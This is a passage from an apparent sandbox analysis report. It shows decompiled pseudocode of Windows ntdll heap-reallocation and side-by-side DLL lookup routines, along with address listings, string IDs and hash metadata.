								_push("HEAP: ");
								E0094373B();
							} else {
								E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E0094373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E009A06F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E008F22D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E009A098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = E00930ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
									E009A16C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0x9d7928; // 0x0
								if(__eflags != 0) {
									_t147 = E00908131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0x9d792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x9d792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E0094373B();
									} else {
										E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E0098F719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E0094373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E009A06F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E0094373B("Just reallocated block at %p to %x bytes\n",  *0x9d7928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0x9d7928; // 0x0
								if(__eflags != 0) {
									_t173 = E00908131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E0090C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E0099F8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E00922568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = E00999AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										E0099FB7A(_t235, _t246, _t248, 1);
										E009A098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0x9d792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E0099F8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E00922568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0x9d792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x9d792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E0094373B();
										} else {
											E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E0098F719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E0094373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E009A06F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E0094373B("About to reallocate block at %p to %x bytes\n",  *0x9d7928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E0099E765();
					L72:
					return E008FDFA1(_t123);
				}
			}




























                                                0x009a1238
                                                0x009a1238
                                                0x009a123a
                                                0x009a123f
                                                0x009a1244
                                                0x009a1247
                                                0x009a124a
                                                0x009a1250
                                                0x009a125a
                                                0x009a1270
                                                0x009a1273
                                                0x009a127a
                                                0x009a1281
                                                0x009a1286
                                                0x009a1288
                                                0x009a129a
                                                0x009a129d
                                                0x009a12a0
                                                0x009a12a2
                                                0x009a12aa
                                                0x009a12aa
                                                0x009a12a4
                                                0x009a12a4
                                                0x009a12a4
                                                0x009a12b9
                                                0x009a12bc
                                                0x009a12be
                                                0x009a1616
                                                0x009a161c
                                                0x009a161f
                                                0x009a1623
                                                0x009a1645
                                                0x009a164a
                                                0x009a1625
                                                0x009a163d
                                                0x009a1642
                                                0x009a1650
                                                0x009a1659
                                                0x009a1663
                                                0x009a169f
                                                0x009a169f
                                                0x009a169f
                                                0x00000000
                                                0x009a12c4
                                                0x009a12c4
                                                0x009a12c7
                                                0x00000000
                                                0x00000000
                                                0x009a12cd
                                                0x009a12d1
                                                0x009a12d9
                                                0x009a12de
                                                0x009a12e2
                                                0x009a12e2
                                                0x009a12e2
                                                0x009a12e2
                                                0x009a12e9
                                                0x009a12f1
                                                0x009a12f4
                                                0x009a12f8
                                                0x009a1301
                                                0x009a1301
                                                0x009a1301
                                                0x009a1306
                                                0x009a130b
                                                0x009a130d
                                                0x009a1516
                                                0x009a1516
                                                0x009a1519
                                                0x009a151b
                                                0x009a16a3
                                                0x009a16a3
                                                0x009a16a3
                                                0x009a16a3
                                                0x009a16a7
                                                0x009a16ae
                                                0x009a16b3
                                                0x00000000
                                                0x009a16b3
                                                0x009a1521
                                                0x009a1527
                                                0x009a1585
                                                0x009a158a
                                                0x009a158f
                                                0x00000000
                                                0x00000000
                                                0x009a1599
                                                0x009a15a0
                                                0x00000000
                                                0x00000000
                                                0x009a15ad
                                                0x009a15b4
                                                0x00000000
                                                0x00000000
                                                0x009a15c0
                                                0x009a15c3
                                                0x009a15c7
                                                0x009a15e9
                                                0x009a15ee
                                                0x009a15c9
                                                0x009a15e1
                                                0x009a15e6
                                                0x009a15fd
                                                0x009a15fe
                                                0x009a1609
                                                0x009a1579
                                                0x009a157b
                                                0x00000000
                                                0x009a157b
                                                0x009a152f
                                                0x009a1532
                                                0x009a1536
                                                0x009a1558
                                                0x009a155d
                                                0x009a1538
                                                0x009a1550
                                                0x009a1555
                                                0x009a1563
                                                0x009a1571
                                                0x00000000
                                                0x009a1313
                                                0x009a1316
                                                0x009a131c
                                                0x009a1375
                                                0x009a137a
                                                0x009a137f
                                                0x009a1468
                                                0x009a1472
                                                0x009a1477
                                                0x009a147a
                                                0x009a147c
                                                0x009a1482
                                                0x009a1482
                                                0x009a1485
                                                0x009a1489
                                                0x009a1492
                                                0x009a1492
                                                0x009a1492
                                                0x009a1494
                                                0x009a1498
                                                0x009a149d
                                                0x009a14a7
                                                0x009a14aa
                                                0x009a14ac
                                                0x009a14ae
                                                0x009a14af
                                                0x009a14b0
                                                0x009a14b0
                                                0x009a14aa
                                                0x009a14b5
                                                0x009a14b9
                                                0x009a14e3
                                                0x009a14bb
                                                0x009a14c1
                                                0x009a14c3
                                                0x009a14ca
                                                0x009a14d3
                                                0x009a14d3
                                                0x009a14cc
                                                0x009a14cc
                                                0x009a14cc
                                                0x009a14d5
                                                0x009a14d8
                                                0x009a14d8
                                                0x009a14e6
                                                0x009a14e9
                                                0x009a14ed
                                                0x009a14f8
                                                0x009a14fe
                                                0x009a1504
                                                0x009a1504
                                                0x009a1504
                                                0x009a14ed
                                                0x009a1509
                                                0x009a1511
                                                0x00000000
                                                0x009a1511
                                                0x009a1385
                                                0x009a1387
                                                0x009a138d
                                                0x00000000
                                                0x00000000
                                                0x009a1393
                                                0x009a1396
                                                0x009a139b
                                                0x009a13a5
                                                0x009a13a8
                                                0x009a13aa
                                                0x009a13ab
                                                0x009a13ac
                                                0x009a13ad
                                                0x009a13ad
                                                0x009a13a8
                                                0x009a13b2
                                                0x009a13b6
                                                0x009a13c9
                                                0x009a13b8
                                                0x009a13be
                                                0x009a13be
                                                0x009a13cc
                                                0x009a13cf
                                                0x009a13d2
                                                0x009a13dd
                                                0x009a13e3
                                                0x009a13e9
                                                0x009a13e9
                                                0x009a13e9
                                                0x009a13eb
                                                0x009a13ee
                                                0x009a13f1
                                                0x009a13f3
                                                0x009a13fa
                                                0x00000000
                                                0x00000000
                                                0x009a1403
                                                0x009a140a
                                                0x00000000
                                                0x00000000
                                                0x009a1412
                                                0x009a1415
                                                0x009a1418
                                                0x009a143a
                                                0x009a143f
                                                0x009a141a
                                                0x009a1432
                                                0x009a1437
                                                0x009a1444
                                                0x009a144e
                                                0x009a144f
                                                0x009a145a
                                                0x009a145f
                                                0x009a1462
                                                0x009a1463
                                                0x009a1463
                                                0x009a1463
                                                0x00000000
                                                0x009a13f1
                                                0x009a1324
                                                0x009a1327
                                                0x009a132b
                                                0x009a134d
                                                0x009a1352
                                                0x009a132d
                                                0x009a1345
                                                0x009a134a
                                                0x009a1357
                                                0x009a1358
                                                0x009a1366
                                                0x009a136b
                                                0x009a136e
                                                0x00000000
                                                0x009a136e
                                                0x009a130d
                                                0x009a12be
                                                0x009a128a
                                                0x00000000
                                                0x009a125c
                                                0x009a125c
                                                0x009a125f
                                                0x009a1262
                                                0x009a1265
                                                0x009a1266
                                                0x009a16b6
                                                0x009a16bb
                                                0x009a16bb

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-3744532478
                                                • Opcode ID: 3ca6129a0a41449ae2e609bd4194d9f8d4623295aac549c80cdf2a6ea095353e
                                                • Instruction ID: 404a281a3d2969982f9d099a8fff43fdd76283dbd9b5c39d1f4edae8a4fd6363
                                                • Opcode Fuzzy Hash: 3ca6129a0a41449ae2e609bd4194d9f8d4623295aac549c80cdf2a6ea095353e
                                                • Instruction Fuzzy Hash: BDC1E071514285AFDB21EF68C845FBAB7F4FF4A710F048448F895DA692C738E980DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008FF3CF, Relevance: 9.2, Strings: 7, Instructions: 466COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E008FF3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				E008FDFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = E008FED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E008FE1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							E0090B90D(_t198, _v72);
						}
						return E008FE1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E009278E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E009278E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E00908980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E0097C0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E009278E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
													E00908980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = E008FFBD7(1,  &_v68, 0x92b024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E009877A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E009278E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E00908980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E009278E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E00908980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
						E00943F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E0091C507(_t303, _v124, _v120,  &_v60, E0091CDAD,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}















































































                                                0x008ff3cf
                                                0x008ff3da
                                                0x008ff3e1
                                                0x008ff3eb
                                                0x008ff3f4
                                                0x008ff3f9
                                                0x008ff3fb
                                                0x008ff3fe
                                                0x008ff408
                                                0x008ff40f
                                                0x008ff412
                                                0x008ff41a
                                                0x008ff41d
                                                0x008ff420
                                                0x008ff423
                                                0x008ff42b
                                                0x008ff42e
                                                0x008ff42f
                                                0x008ff433
                                                0x008ff439
                                                0x008ff444
                                                0x008ff44e
                                                0x008ff451
                                                0x008ff454
                                                0x008ff457
                                                0x008ff45f
                                                0x008ff463
                                                0x0091c2bb
                                                0x0091c2bf
                                                0x0091c4fb
                                                0x0091c4fb
                                                0x008ff475
                                                0x008ff475
                                                0x008ff478
                                                0x008ff47d
                                                0x008ff481
                                                0x00953bf8
                                                0x00953bfb
                                                0x00953c00
                                                0x00953c00
                                                0x008ff48a
                                                0x008ff48d
                                                0x008ff48d
                                                0x008ff490
                                                0x008ff495
                                                0x008ff499
                                                0x008ff499
                                                0x008ff4a2
                                                0x008ff4a6
                                                0x008ff4aa
                                                0x008ff4ae
                                                0x0090e238
                                                0x0090e238
                                                0x008ff4c3
                                                0x008ff4c3
                                                0x0091c2c5
                                                0x0091c2cf
                                                0x0091c2d2
                                                0x00934327
                                                0x00934327
                                                0x00000000
                                                0x00934327
                                                0x0091c2d8
                                                0x0091c2df
                                                0x00000000
                                                0x00000000
                                                0x0091c2e5
